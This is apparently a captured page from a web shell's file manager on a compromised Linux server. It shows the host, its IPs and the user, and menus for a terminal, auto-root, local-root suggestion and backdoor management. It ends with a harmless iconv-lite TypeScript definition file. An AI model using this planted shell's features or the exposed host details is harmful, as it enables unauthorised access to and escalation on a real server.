Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.219.203.214
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
iconv-lite /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
bom-handling.js
1.08
KB
-rw-rw-r--
2022-08-30 11:49
extend-node.js
8.5
KB
-rw-rw-r--
2022-08-30 11:49
index.d.ts
982
B
-rw-rw-r--
2022-08-30 11:49
index.js
5
KB
-rw-rw-r--
2022-08-30 11:49
streams.js
3.31
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
/*--------------------------------------------------------------------------------------------- * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. * REQUIREMENT: This definition is dependent on the @types/node definition. * Install with `npm install @types/node --save-dev` *--------------------------------------------------------------------------------------------*/ declare module 'iconv-lite' { export function decode(buffer: Buffer, encoding: string, options?: Options): string; export function encode(content: string, encoding: string, options?: Options): Buffer; export function encodingExists(encoding: string): boolean; export function decodeStream(encoding: string, options?: Options): NodeJS.ReadWriteStream; export function encodeStream(encoding: string, options?: Options): NodeJS.ReadWriteStream; } export interface Options { stripBOM?: boolean; addBOM?: boolean; defaultEncoding?: string; }